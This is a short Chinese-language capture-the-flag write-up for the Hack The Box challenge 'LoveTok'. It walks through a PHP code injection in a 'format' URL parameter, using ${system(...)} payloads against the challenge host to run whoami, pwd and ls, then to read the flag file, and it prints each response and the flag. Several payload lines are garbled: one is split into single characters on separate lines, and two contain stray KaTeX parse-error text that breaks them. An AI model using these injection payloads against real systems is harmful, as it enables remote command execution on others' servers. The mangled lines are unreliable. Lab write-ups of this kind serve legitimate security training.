免责声明:本教程仅限学术讨论使用,请勿作用于非法用途!!!如有用于非法用途,本人概不负责。
题目来源
Hackthebox LoveTok 此为docker虚拟机 打开机器浏览器即可访问
步骤、思路
下载对应的材料文件,观察发现参数format存在PHP命令注入漏洞
http://157.245.42.220:30361/?format=${system(phpinfo())}
response:phpinfo page
http://157.245.42.220:30361/?format=${system(whoami)}
response: www
http://157.245.42.220:30361/?format=${system(pwd)}
response:/www
http://157.245.42.220:30361/?format=
s
y
s
t
e
m
(
l
s
)
h
t
t
p
:
/
/
157.245.42.220
:
30361
/
?
f
o
r
m
a
t
=
{system(ls)} http://157.245.42.220:30361/?format=
system(ls)http://157.245.42.220:30361/?format={system($_GET[1])}&1=ls
response:Router.php assets controllers index.php models static views
http://157.245.42.220:30361/?format=KaTeX parse error: Expected '}', got 'EOF' at end of input: {system(_GET[1])}&1=ls+/
response: bin boot dev entrypoint.sh etc flagkj75g home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var www
http://157.245.42.220:30361/?format=KaTeX parse error: Expected '}', got 'EOF' at end of input: {system(_GET[1])}&1=cat+/flagkj75g
response:HTB{wh3n_l0v3_g3ts_eval3d_sh3lls_st4rt_p0pp1ng}
reference:
https://blog.csdn.net/m0_62584974/article/details/123963444
https://blog.csdn.net/shuaizhijun/article/details/118891869